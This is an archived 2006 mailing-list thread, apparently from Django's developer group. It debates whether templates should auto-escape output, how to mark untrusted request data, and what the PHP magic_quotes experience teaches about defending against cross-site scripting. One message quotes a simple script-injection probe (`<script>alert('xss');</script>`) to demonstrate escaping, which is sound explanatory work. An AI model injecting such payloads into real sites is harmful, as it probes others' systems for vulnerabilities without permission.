misunderstood what you meant by "translate".)

> [...]


>
> 4. The template engine automatically escapes untrusted strings
> (unless explicitly passed through a ``raw`` filter) -- this protects
> you from errors when echoing back data given from the browser.

+1 Amen!

> 5. If untrusted strings "sneak" all the way down to the database
> layer... well, I'm not sure about this step; potential options are
> (a) automatically escaping before storing in the database, (b)
> raising an exception, or (c) just letting it happen. I think I
> prefer (b).
>

I think a full-on exception might be a bit harsh, but it could be the
best solution. I don't intend to open a can of worms up here, but
what if manage.py offered a "basic security check" function that is
either run only explicitly by the user or as part of some other
function (syncdb etc.) that checks for untrusted strings that are
publicly viewabel and simply lists them as warnings.

> Thoughts?

Given!

-Tyson

[1] Here at work, we have dozens of JSP intranet apss (*shudder*)
that we've had to go through and implement string escaping for
*everything*. Anything that gets displayed that in some way or form
could have possibly been touched by the outside world must be escaped
manually. *barf*

[2] Sample from Wikipedia's excellent XSS article:

>>> import cgi

>>> print "<script>alert('xss');</script>"
<script>alert('xss');</script>

>>> print cgi.escape("<script>alert('xss');</script>");
&lt;script&gt;alert('xss');&lt;/script&gt;

Ian Holsman

unread,
Jun 21, 2006, 9:07:02 PM6/21/06
to django-d...@googlegroups.com
I have to agree with these comments.
get the crap out at the 'input'/validation level.. once it has the
database/rendering stage it is too late.

while this submission isn't perfect, this is what I did to protect
against my own laziness on externally facing apps.

http://svn.zyons.python-hosting.com/trunk/zilbo/common/utils/
middleware/SafePost.py

before you go attack the code, I know it doesn't catch everything,
and I plan on switching to feedparser's validation soon.

the concept is that EVERY post request field is sanitized before it
even hits the view's code.
possible enhancements would be to have a 'exclude' list of field
names which it wouldn't sanitize. (which would be set in your
settings.py file)

the other positive about this is that it is 100% optional. if you
don't want to do XSS parsing you don't need to load it.

Todd O'Bryan

unread,
Jun 21, 2006, 9:35:26 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 6:41 PM, Jacob Kaplan-Moss wrote:

> There's
> no right and wrong here, there's just what "fits" with the rest of
> the framework, and encapsulating a distrust of the developer into
> this framework doesn't feel right.

Does there seem to be consensus out there among web frameworks about
whether escape=default, raw=exception or raw=default, escape=exception?

I came to Django from Tapestry and was used to default escaping. In
fact, I now have to go back and add an escape filter to all my tags,
because none of them *need* to be raw yet, and I'd prefer not to
allow raw HTML unless I think it might be necessary.

Regardless of how this gets solved (and I'd prefer escaping, by
default; the number of times I *need* raw HTML is small), shouldn't
it be configurable by putting the appropriate tag in your base
template, either to turn it on or off. *That's* the deal-breaker, I
think. I should be able to put

{% auto_escape on %}

blah blah blah

{% auto_escape %}

in the template that's the supertemplate of all templates and get the
behavior I want by default in everything. Given that it should only
be two lines to get whatever you want, I think the default-ness is
not that big a deal.

Todd

Jacob Kaplan-Moss

unread,
Jun 21, 2006, 9:57:01 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 8:35 PM, Todd O'Bryan wrote:
> Does there seem to be consensus out there among web frameworks about
> whether escape=default, raw=exception or raw=default,
> escape=exception?

Not really sure, myself -- my impression is that most web frameworks
don't think about XSS all that hard at all (and just leave it up to
developers to Do The Right Thing) but I'm not sure, really.

> I should be able to put
>
> {% auto_escape on %}
>
> blah blah blah
>
> {% auto_escape %}
>
> in the template that's the supertemplate of all templates and get the
> behavior I want by default in everything.

Yes, I agree -- I've never been against a template tag which does
autoescape because that's still leaving power in the hands of the
template authors.

Jacob

SmileyChris

unread,
Jun 21, 2006, 10:29:08 PM6/21/06
to Django developers
Hi Jacob,

On Jun 21, 2006, at 5:16 PM, SmileyChris wrote:
> > Having used TAL a lot (like KID, automatically escapes), I did not
> > actually find this annoying.

Jacob Kaplan-Moss wrote:
> I really wish there was a way of saying this that didn't make me
> sound like a jerk... but:
>
> If you like TAL better, use it.

Don't worry, no offense taken. I don't like TAL better, I was merely
pointing out that I did not find this an annoying behaviour.
I also understand that Django's template language can't please
everybody and that I am free to use alternate templating systems.

My point was simply that even though I would place myself in the
"experienced web developer" category, I personally prefered
auto-escaping systems.

Out of interest, have you (both Jacob and anyone else involved in this
discussion) seriously tried both and had a problem with auto-escaping?

> Yes, Django should be accessible to newbies, but newbie-friendliness
> needs to be balanced against the needs of experienced web developers
> (who likely already know all about XSS).

Out of interest, have you (both Jacob and anyone else involved in this
discussion) seriously tried an auto-escaping templating system and had
a problem with it opposing your needs?

Jacob Kaplan-Moss

unread,
Jun 21, 2006, 10:54:37 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 9:29 PM, SmileyChris wrote:
> Out of interest, have you (both Jacob and anyone else involved in this
> discussion) seriously tried an auto-escaping templating system and had
> a problem with it opposing your needs?

At the risk of turning this into a war stories thread, I've had to
deal with:

* a templating system that throws a hard error any time you try to
output anything that looks like HTML which the system seems to
interpret as "anything with a '<', '>', or '&' in it"

* a so-called "security" layer that urlencodes (why? who knows...)
every piece of GET or POST data (resulting in double-encoded content
much of the time)

* HTML stored in a database as "&amp;lt;a
href=&amp;quot;#link&smp;quot;&amp;gt;" for reasons nobody could
figure out

* and, yes, template systems that automatically escaped data.

Of course, the first three are *far* worse than the last one, but all
lie on the continuum of automatically screwing with my data in the
name of "safety".

Jacob


Tyson Tate

unread,
Jun 21, 2006, 11:00:22 PM6/21/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 6:57 PM, Jacob Kaplan-Moss wrote:

> Yes, I agree -- I've never been against a template tag which does
> autoescape because that's still leaving power in the hands of the
> template authors.

Then again, how often do you *want* to allow your users to put HTML
and JS in and allow it to be executed? Not often, I imagine. And
following that, I think Django should, of the two options, cover the
majority, which I believe is "escape by default" and allow {%
autoescape off %}. For the sake of security, I'm really hoping to see
escaping automatically turned on.

Regards,
Tyson

James Bennett

unread,
Jun 21, 2006, 11:50:11 PM6/21/06
to django-d...@googlegroups.com
On 6/21/06, Tyson Tate <ty...@fallingbullets.com> wrote:
> Then again, how often do you *want* to allow your users to put HTML
> and JS in and allow it to be executed? Not often, I imagine.

This depends completely on the type of application. Some applications
will have very little HTML input by users, but some applications may
have tons and tons of HTML input by users.

> And
> following that, I think Django should, of the two options, cover the
> majority, which I believe is "escape by default" and allow {%
> autoescape off %}. For the sake of security, I'm really hoping to see
> escaping automatically turned on.

Has the world honestly learned not one single solitary thing form
PHP's magic_quotes fiasco? Autoescaping all output by default is
something that is unequivocally not acceptable.

Matt McDonald

unread,
Jun 22, 2006, 12:08:12 AM6/22/06
to django-d...@googlegroups.com
If you don't ever want to display the html then it shouldn't be
stored in the first place. The escaping/removing should be done when
processing the input. What's better:

1. escaping/removing when the data is saved (one time occasion) or
2. escaping/removing each time the data is used (infinite times)

So I think we should be concentrating more on what gets through the
input and stored rather than worrying about if something needs to be
escaped or not and by default or not.

Tyson Tate

unread,
Jun 22, 2006, 12:11:14 AM6/22/06
to django-d...@googlegroups.com
On Jun 21, 2006, at 8:50 PM, James Bennett wrote:
> Has the world honestly learned not one single solitary thing form
> PHP's magic_quotes fiasco? Autoescaping all output by default is
> something that is unequivocally not acceptable.

Oh - I haven't heard of the magic_quotes fiasco. Do you have any
links or more information about this? If it blew up for the PHP
folks, I think I'd be prone to changing my position on the issue.

Regards,
Tyson

James Bennett

unread,
Jun 22, 2006, 12:54:13 AM6/22/06
to django-d...@googlegroups.com
On 6/21/06, Tyson Tate <ty...@fallingbullets.com> wrote:
> Oh - I haven't heard of the magic_quotes fiasco. Do you have any
> links or more information about this? If it blew up for the PHP
> folks, I think I'd be prone to changing my position on the issue.

The magic_quotes setting in PHP is a "feature" which attempted to
automatically escape input data. The theory was that it would prevent
SQL injection attacks (which were and still are a common form of
attack against database-backed applications) by escaping data before
storage.

In reality, however, it proved to be a nightmare for application
developers; you never knew if a particular host's setup would have
magic_quotes on or off, and there were actually *two* commonly used
settings and a third less-common one which could enable various forms
of escaping. Before you could even think about looking at data your
program received, you had to test for these settings to figure out
what sort of escaping PHP was "helpfully" doing for you.

It's led to an interesting situation where, despite being turned on by
default in PHP, the official documentation recommends turning it off.
Supposedly, PHP6 will finally send magic_quotes to the grave.

Michael Radziej

unread,
Jun 22, 2006, 3:33:13 AM6/22/06
to django-d...@googlegroups.com

Am 22.06.2006 um 06:54 schrieb James Bennett:

>
> On 6/21/06, Tyson Tate <ty...@fallingbullets.com> wrote:
>> Oh - I haven't heard of the magic_quotes fiasco. Do you have any
>> links or more information about this? If it blew up for the PHP
>> folks, I think I'd be prone to changing my position on the issue.
>
> The magic_quotes setting in PHP is a "feature" which attempted to
> automatically escape input data. The theory was that it would prevent
> SQL injection attacks (which were and still are a common form of
> attack against database-backed applications) by escaping data before
> storage.

Now, come on, that's a completely different thing than auto-escaping
of variables in the template. I had no idea php is/was *that* brain-
dead (*shiver*)

Was this your experience with auto-escaping? Then it wasn't.

Michael


Michael Radziej

unread,
Jun 22, 2006, 3:33:29 AM6/22/06
to django-d...@googlegroups.com
Hey,

First, let me note that we're discussing one aspect of Django and
whether or not there is a sensible way to harden it agains XSS
exploits. It is not whether this or the other way is better ...

Now, I don't like to put the whole burden into the input validation,
since I believe

* There's no reason to restrict user input
* It's near to impossible to do it properly since many browser have
strange interpretations of html

and

* there might be another application writing stuff into the database
which might not validate the input to the same level. (And that's
what I currently work on ... sigh.)

> Another place to start solving the XSS problem is at the input level;
> a policy of "don't trust data from the web" makes a lot more sense to
> me than one of "don't trust the template author".

It's not about trusting the template author. It's about experience
that shows that these tiny things are forgotten *all the time by
everybody*. So I say:

A policy of properly turing data into its html format ("escaping")
makes a lot more sense to me than one of "censor the user and
restrict what they are allowed to write"

;-)

> Anyway, here's a rough sketch of how I'd picture enforced mistrust of
> browser-supplied data:
>
> 1. request.GET['whatever'] returns a ``untrusted_string`` object, not
> a regular string
>
> 2. Methods exist somewhere to "translate" untrusted strings into
> "normal" strings given a particular format. Like Simon, I'm not sure
> how to spell this, but I'm sure a good syntax could be found.
>
> 3. Manipulator's ``do_html2python`` methods automatically call these
> untrusted -> trusted methods based on field types; this makes the
> common case of using a manipulator unchanged.
>
> 4. The template engine automatically escapes untrusted strings
> (unless explicitly passed through a ``raw`` filter) -- this protects
> you from errors when echoing back data given from the browser.
>
> 5. If untrusted strings "sneak" all the way down to the database
> layer... well, I'm not sure about this step; potential options are
> (a) automatically escaping before storing in the database, (b)
> raising an exception, or (c) just letting it happen. I think I
> prefer (b).

5 (a) looks horrible. This is what "munging your data" really means
in a bad sense.
I'm undecided between b or c.

>
> Thoughts?

Now, it *does* look interesting, although it won't help me since
there's another application parallel to mine that fills data into the
database.

Anyway, if this would be the way to go, I'd add:


6) A database field UntrustedTextField (or whatever, couldn't think
of a better name).
It's for data where the user is allowed to enter everything they
want, and it needs to be
properly escaped for display on an html page.
Its do_html2python would return an untrusted string, so that the
template system would
escape it as you specified in step 4.

Then, I'd like to see a sketch how exactly you want to validate a
normal TextField (not the UntrustedTextField). I think this is
really, really hard if not impossible.

>
> PS: To be a bit more explicit about my thoughts on this whole thread:
> I'd say at this point any XSS proposal that involves some sort of
> mangling at the template level is pretty much a non-starter. So
> let's all focus our attentions on attacking this problem from the
> other direction.

Agreed. I really don't distrust the template author to that level ;-)

Michael Distrusts-Himself


James Bennett

unread,
Jun 22, 2006, 3:36:02 AM6/22/06
to django-d...@googlegroups.com
On 6/22/06, Michael Radziej <m...@django.m1.spieleck.de> wrote:
> Now, come on, that's a completely different thing than auto-escaping
> of variables in the template. I had no idea php is/was *that* brain-
> dead (*shiver*)

The problem of suddenly having to figure out ways to tell whether
you're dealing with escaped or unescaped content is the same.

James Bennett

unread,
Jun 22, 2006, 3:48:06 AM6/22/06
to django-d...@googlegroups.com
On 6/22/06, Michael Radziej <m...@django.m1.spieleck.de> wrote:
> Now, I don't like to put the whole burden into the input validation,

And nobody's really suggesting that we should; we already provide a
template filter for sanitizing on output, and a block tag for doing
the same seems like a decent idea. Now let's focus on input and make
sure we're providing mechanisms for securing things on both ends.

> * There's no reason to restrict user input

Sure there is; just look at the 'hasNoProfanities' validator in
django.core.validators for an example.

> * It's near to impossible to do it properly since many browser have
> strange interpretations of html

?

> * there might be another application writing stuff into the database
> which might not validate the input to the same level. (And that's
> what I currently work on ... sigh.)

That's what database-level validation is for.

> It's not about trusting the template author. It's about experience
> that shows that these tiny things are forgotten *all the time by
> everybody*. So I say:

So... you don't trust them is what your'e saying?

> A policy of properly turing data into its html format ("escaping")
> makes a lot more sense to me than one of "censor the user and
> restrict what they are allowed to write"

There's a big whopping difference between "censoring" and stopping
hackers from launching XSS attacks.

> 6) A database field UntrustedTextField (or whatever, couldn't think
> of a better name).

Every text field in a database is an UntrustedTextField until you do
something to make it not be so.

> It's for data where the user is allowed to enter everything they
> want

Which returns us to the situation that made me bring up input
validation in the first place: if you go ahead and concede that
"anything" can go into the database, you now have a single point of
failure. Either your escaping system for output has to be 100% perfect
100% of the time, or you're screwed.

That's not good security practice, and I don't want to see Django advocating it.

> Then, I'd like to see a sketch how exactly you want to validate a
> normal TextField (not the UntrustedTextField). I think this is
> really, really hard if not impossible.

For given values of "validate", yes. It is, however, easy to write
validator functions which will reject anything that looks like HTML,
and HTML is the most important threat.

I think part of the problem we've been having since this discussion
started is that it's tempting to believe that there's some magic
bullet that can make things secure -- that if only we'd escape
everything we output, or apply some magical validator to everything
users input, we'll be safe.

There are no magic bullets. The best defense for a web application is
to have best practices applied at every layer, and that's what we need
to be developing and encouraging.

Simon Willison

unread,
Jun 22, 2006, 7:08:54 AM6/22/06
to django-d...@googlegroups.com
On 22 Jun 2006, at 08:48, James Bennett wrote:

> For given values of "validate", yes. It is, however, easy to write
> validator functions which will reject anything that looks like HTML,
> and HTML is the most important threat.

I disagree that it's easy to write that kind of validator function -
and I think trying to do so is a mistake. What if I want to post a
comment on a forum like this?

"""
Don't worry Timmy, links in HTML are easy - just use <a href="URL
HERE">LINK TEXT</a>
"""

That looks like HTML - because it is! But I had no intention of
messing anything up.

Cheers,

Simon

Simon Willison

unread,
Jun 22, 2006, 7:13:03 AM6/22/06
to django-d...@googlegroups.com

On 22 Jun 2006, at 04:50, James Bennett wrote:

>> following that, I think Django should, of the two options, cover the
>> majority, which I believe is "escape by default" and allow {%
>> autoescape off %}. For the sake of security, I'm really hoping to see
>> escaping automatically turned on.
>
> Has the world honestly learned not one single solitary thing form
> PHP's magic_quotes fiasco? Autoescaping all output by default is
> something that is unequivocally not acceptable.

Magic quotes escaped all INPUT by default, and did it based on a
global setting (which meant code couldn't be moved from one
environment to another if their global setting differed). The lessons
I take from this are:

1. Never have a global setting that might make code impossible to reuse
2. Don't make assumptions about how input data will be used.

Auto escaping output is not affected by either of these.

Cheers,

Simon

Deryck Hodge

unread,
Jun 22, 2006, 9:24:30 AM6/22/06
to django-d...@googlegroups.com
Hi, all. Yes, I like this much better, too.

> 1. request.GET['whatever'] returns a ``untrusted_string`` object, not
> a regular string
>
> 2. Methods exist somewhere to "translate" untrusted strings into
> "normal" strings given a particular format. Like Simon, I'm not sure
> how to spell this, but I'm sure a good syntax could be found.
>

I'd be interested to see how this looks. It'd be nice to just be able
to convert the string trusted/untrusted and have this be smart about
format. Seems a crucial step to me.

> 3. Manipulator's ``do_html2python`` methods automatically call these
> untrusted -> trusted methods based on field types; this makes the
> common case of using a manipulator unchanged.
>
> 4. The template engine automatically escapes untrusted strings
> (unless explicitly passed through a ``raw`` filter) -- this protects
> you from errors when echoing back data given from the browser.
>
> 5. If untrusted strings "sneak" all the way down to the database
> layer... well, I'm not sure about this step; potential options are
> (a) automatically escaping before storing in the database, (b)
> raising an exception, or (c) just letting it happen. I think I
> prefer (b).
>

I'm not sure here either. I'd be inclinded to go (c). If untrusted
strings make it to the db, it's the same scenario as forgetting to
escape. Seems we'd want to encourage best practices, not enforce.
But again, I'm not sure on this one. (b) would work just as well.

Flip a coin. ;-)

Cheers,
deryck

--
Deryck Hodge http://www.devurandom.org/
Samba Team http://www.samba.org/
To begin... To begin... How to start? I'm hungry.
I should get coffee. Coffee would help me think. --Charlie Kaufman

Michael Radziej

unread,
Jun 22, 2006, 9:38:33 AM6/22/06
to django-d...@googlegroups.com
Hi Jacob,

Jacob Kaplan-Moss wrote:
> 2. Methods exist somewhere to "translate" untrusted strings into
> "normal" strings given a particular format. Like Simon, I'm not sure
> how to spell this, but I'm sure a good syntax could be found.

I'm not sure I missed a point; is this, for html, the same as escape?

Michael

James Bennett

unread,
Jun 22, 2006, 11:10:00 AM6/22/06
to django-d...@googlegroups.com
On 6/22/06, Simon Willison <swil...@gmail.com> wrote:
> I disagree that it's easy to write that kind of validator function -
> and I think trying to do so is a mistake. What if I want to post a
> comment on a forum like this?

Then you'd get caught by the validator.

Thinking about the implications of disallowing HTML in inputs is
something people will need to do; in the particular case you bring up
a better policy would be to use escaping on output so that people who
post instructional HTML samples can do so and have them show up
properly.

Note also that the example you mention wouldn't work as the user
expects *unless* there's some escaping going on; otherwise it would
show a link, not the code ;)

But I'll rephrase anyway.

Writing a validator which catches things that look like HTML isn't
particularly hard. Figuring out how much it should catch and when to
use it can be hard.

waylan

unread,
Jun 22, 2006, 12:57:45 PM6/22/06
to Django developers
I've been following this thread since the get-go with interest, but am
a first time commenter here. Although I think the devs have a clear
picture, I get the feeling that some participants in this discussion
are geting input validation and output escaping confused which is
generating lots of unnessesary discussion. Let me use an oversimplified
example to explain. Let's suppose a user submits the following text to
your app:

1 < 2 & 2 > 3

Now, that obviously is not html and as far as I can tell will not
create any obvious security problems, so assuming you have good
validators, that text should then pass validation and be written to the
db as is.

Some are suggesting that this text should be escaped before being
written to the db. It is true that the above text should be rendered as
follows in html/xml documents:

1 &lt; 2 &amp; 2 &gt; 3

However, this is where the problem arises. Suppose one needs to output
the text to a plain text file (such an an email or csv file)? If the
escaped text is in the db, it then would have to be 'unescaped' in
those cases. That is why escaping must remain in the template, and only
the template author will know if some data needs to be escaped in that
particular case (regardless of his (lack of) understanding of XSS).

I don't mean to undermine data validation. That is very important as
well and should never be overlooked. It's just that validation may not
be the end all solution that some make it out to be. I understand that
good/better validation is coming/in the works, but this thread is about
escaping. I suppose escaping could be effected by how validation is
implemented but that brings up the chicken-egg question which I won't
ask.

It seems to me the real question is whether escaping should be on or
off by default and which would be more/less annoying. I think I'm with
Simon on this when he says he would have to try it both ways to see
which works best. Until then, I'll keep manually escaping things in the
template.

One more thing: regardless of whether escaping is on or off by default,
having the block tags to turn it on or off for an entire template (or
part of one) as well as raw and escape filters for individual variables
would be very handy and can certainly be implimented before the
'default behavior' descision is made.

James Bennett

unread,
Jun 22, 2006, 1:12:12 PM6/22/06
to django-d...@googlegroups.com
On 6/22/06, waylan <way...@gmail.com> wrote:
> Some are suggesting that this text should be escaped before being
> written to the db. It is true that the above text should be rendered as
> follows in html/xml documents:

I don't think we should escape before storing. I think we should
*validate* before storing. In other words, we do everything we can to
make sure that the data going into the db looks like it's supposed to
look.

Then on output you don't have to worry about it having been magically
pre-escaped somewhere along the line. You just escape if it's
something that you think needs escaping (again, don't have a single
point of failure -- validate the input *and* escape the output if
you've got a field that should never contain HTML), and get on with
life.

Michael Radziej

unread,
Jun 22, 2006, 1:13:58 PM6/22/06
to django-d...@googlegroups.com
Hi,

waylan wrote:
> I've been following this thread since the get-go with interest, but am
> a first time commenter here. Although I think the devs have a clear
> picture, I get the feeling that some participants in this discussion
> are geting input validation and output escaping confused which is
> generating lots of unnessesary discussion. Let me use an oversimplified
> example to explain. Let's suppose a user submits the following text to
> your app:
>
> 1 < 2 & 2 > 3
>
> Now, that obviously is not html and as far as I can tell will not
> create any obvious security problems, so assuming you have good
> validators, that text should then pass validation and be written to the
> db as is.

I assume this is about Jacob's proposal, and it's handling this
case correctly. Let's go through the steps he specified:

> 1. request.GET['whatever'] returns a ``untrusted_string``
object, not
> a regular string

So you have an UntrustedString('1 < 2 & 2 > 3')

> 2. Methods exist somewhere to "translate" untrusted strings into
> "normal" strings given a particular format. Like Simon, I'm
not sure
> how to spell this, but I'm sure a good syntax could be found.

> 3. Manipulator's ``do_html2python`` methods automatically call
these
> untrusted -> trusted methods based on field types; this makes the
> common case of using a manipulator unchanged.

This turns into '1 < 2 & 2 > 3', since it's safe.


> 4. The template engine automatically escapes untrusted strings
> (unless explicitly passed through a ``raw`` filter) -- this
protects
> you from errors when echoing back data given from the browser.

does not apply

> 5. If untrusted strings "sneak" all the way down to the database
> layer... well, I'm not sure about this step; potential options
are
> (a) automatically escaping before storing in the database, (b)
raising an exception, or (c) just letting it happen. I think I
prefer (b).

does not apply--it's already a normal string, not an untrusted one.

> One more thing: regardless of whether escaping is on or off by default,
> having the block tags to turn it on or off for an entire template (or
> part of one) as well as raw and escape filters for individual variables
> would be very handy and can certainly be implimented before the
> 'default behavior' descision is made.

;-)

Michael

Martina Oefelein

unread,
Jun 22, 2006, 3:20:43 PM6/22/06
to django-d...@googlegroups.com
Hi Jacob!

>
> On Jun 21, 2006, at 12:13 PM, Simon Willison wrote:
>> Rather than directly accessing GET and POST data
>> you do it through some mechanism that /guarantees/ the format of the
>> data returned - and raises an exception if it can't make that
>> guarantee. There is no possible way of invalid data ending up in the
>> email and age variables, so once you're past that bit of code you can
>> continue safe in the knowledge that the data is at least in the right
>> format.
>>
>> Obviously I haven't figured out exactly how the API for this should
>> look, but I think the core concept is really powerful.
>
> OK, *now* we're getting somewhere!
>

> Another place to start solving the XSS problem is at the input level;
> a policy of "don't trust data from the web" makes a lot more sense to
> me than one of "don't trust the template author".
>

> Following that thread, I'm much more receptive to ideas involving
> "tainting" the data in request.GET and friends. Actually, I'm going
> to try to stay away from the word "taint" since it evokes both a
> nasty bit of perl *and* a nasty bit of male anatomy...
>

> Anyway, here's a rough sketch of how I'd picture enforced mistrust of
> browser-supplied data:
>

> 1. request.GET['whatever'] returns a ``untrusted_string`` object, not
> a regular string
>

> 2. Methods exist somewhere to "translate" untrusted strings into
> "normal" strings given a particular format. Like Simon, I'm not sure
> how to spell this, but I'm sure a good syntax could be found.

would this escape the string? Having read your comment about HTML

stored in a database as "&amp;lt;a

href=&amp;quot;#link&smp;quot;&amp;gt;", I would think: no.

so exactly what would the translation do?

Would it raise an exception if it encounters "dangerous" input?

And last, but not least: what criteria would it use to decide what is
bad and what is good input?

Perl's "untainting", if I remember correctly, just removes the taint
marker, it doesn't change the data itself. I think the rationale is
that by untainting it, you state explicitly that you have checked the
data for being save *in the specific context of your application*. Is
that what you intend?

> 3. Manipulator's ``do_html2python`` methods automatically call these
> untrusted -> trusted methods based on field types; this makes the
> common case of using a manipulator unchanged.
>

> 4. The template engine automatically escapes untrusted strings
> (unless explicitly passed through a ``raw`` filter) -- this protects
> you from errors when echoing back data given from the browser.
>

> 5. If untrusted strings "sneak" all the way down to the database
> layer... well, I'm not sure about this step; potential options are
> (a) automatically escaping before storing in the database, (b)
> raising an exception, or (c) just letting it happen. I think I
> prefer (b).

> PS: To be a bit more explicit about my thoughts on this whole thread:
> I'd say at this point any XSS proposal that involves some sort of
> mangling at the template level is pretty much a non-starter. So
> let's all focus our attentions on attacking this problem from the
> other direction.

For me, escaping is not only about XSS, but mainly about correct
output (correct both in the sense of syntactically well-formed
documents as well as in the sense of rendering it as expected). Some
security against XSS is "only" an additional benefit.

Not everybody outputs only html. People might also output other
formats (and Django templates can do this very well). Unfortunately,
each format has different requirements for escaping, so escaping
should be done on the output side. And I think the template engine
should not be tied to a particular format. That's why I think it
should be explicitly requested in the template itself.

You could also guess the escaping from the extension, but I think
this would be too "magic".

ciao
Martina

waylan

unread,
Jun 22, 2006, 3:34:48 PM6/22/06
to Django developers
Michael Radziej wrote:
[snip]

>
> I assume this is about Jacob's proposal, and it's handling this
> case correctly. Let's go through the steps he specified:
>
[snip]

Whether it is handling this case correctly or not, it still needs to be
escaped in an html or xml template, but not in a plain text document.
Therefore, we still need the option of escaping (or not) at the
template level regardless of any validation in place, which was the
point I was trying to make. However, it appears that someone has now
changed the subject to 'validation' from 'escaping'...

waylan

unread,
Jun 22, 2006, 3:38:10 PM6/22/06
to Django developers

James Bennett wrote:
> On 6/22/06, waylan <way...@gmail.com> wrote:
> > Some are suggesting that this text should be escaped before being
> > written to the db. It is true that the above text should be rendered as
> > follows in html/xml documents:
>
> I don't think we should escape before storing. I think we should
> *validate* before storing. In other words, we do everything we can to
> make sure that the data going into the db looks like it's supposed to
> look.
>
> Then on output you don't have to worry about it having been magically
> pre-escaped somewhere along the line. You just escape if it's
> something that you think needs escaping (again, don't have a single
> point of failure -- validate the input *and* escape the output if
> you've got a field that should never contain HTML), and get on with
> life.
>
Uh, I thought that was the point I was making, or was I not clear
enough?

SmileyChris

unread,
Jul 5, 2006, 9:50:39 PM7/5/06
to Django developers
> Yes, Django should be accessible to newbies, but newbie-friendliness
> needs to be balanced against the needs of experienced web developers
> (who likely already know all about XSS).

To exume an old horse and continue beating it, experienced web
developers may know all about XSS, but they will *still make mistakes*.
http://code.djangoproject.com/ticket/2290 is yet another example of
unescaped strings slipping past "experienced web developers".

Ok, ignore that vent. Now I'll try and be more constructive.

The following proposal assumes that we want template level
auto-escaping functionality and will provide it using the
escaped/non-escaped string idea from
http://code.djangoproject.com/wiki/AutoEscaping.

My proposal is that we don't use a {% autoescape on/off %} block tag or
a new |raw filter in the template source at all, but rather always use
the view to set it the auto-escaping status.
The developer wanting to use autoescaping can simply mark any variables
which should be raw using markescaped() in the view.

Rather than hard coding the escape method into VariableNode.render(),
the additional methods would be changed:
- django.template, Template.render(..., escaper=None)
- django.template.loader, render_to_string(..., escaper=None)
and the VariableNode.render() would pass the string through the escaper
(if one is given).

It is reasonably straight forward to identify the filters which do
their own escaping. Like the wiki article says, they can simply be
flagged with markescaped() in the filters.

Since it's done explicitly in the view, hopefully this helps to appease
Adrian's fears of escape munging being too hidden / magical.

So nothing up to this stage even breaks backwards compatibility.

A further step (an implementation of the on-by-default idea) would be
to set the default to render_to_string(..., escaper=True) but raise an
exception unless escaper resolves to False or is a subclass of Escaper.
This would break backwards compatibility, but becomes even more
explicit, which I hear is a good thing ;)

Malcolm Tredinnick

unread,
Jul 5, 2006, 10:40:39 PM7/5/06
to django-d...@googlegroups.com
On Wed, 2006-07-05 at 18:50 -0700, SmileyChris wrote:
[...]

> My proposal is that we don't use a {% autoescape on/off %} block tag or
> a new |raw filter in the template source at all, but rather always use
> the view to set it the auto-escaping status.
> The developer wanting to use autoescaping can simply mark any variables
> which should be raw using markescaped() in the view.

One ongoing theme throughout this endless discussion has been trying to
avoid templates working differently in different contexts. Your proposal
again leads to a case where looking at the template does not provide
information about what is escaped or not. And, in fact, the answer to
that question is different depending upon which view is used to render
the template. That seems problematic.

Malcolm

SmileyChris

unread,
Jul 6, 2006, 12:09:35 AM7/6/06
to Django developers
Hi Malcom,

Thanks for the comments.

Does the template source *need* to provide information on what is
escaped or not?

The view is handling a lot of the output format anyway, I personally
don't see a problem with looking there to see how a template is being
escaped.

Then again, I guess escaping is "presentation logic" and maybe it
should be coupled to the template source... any other thoughts, people?

It is loading more messages.
0 new messages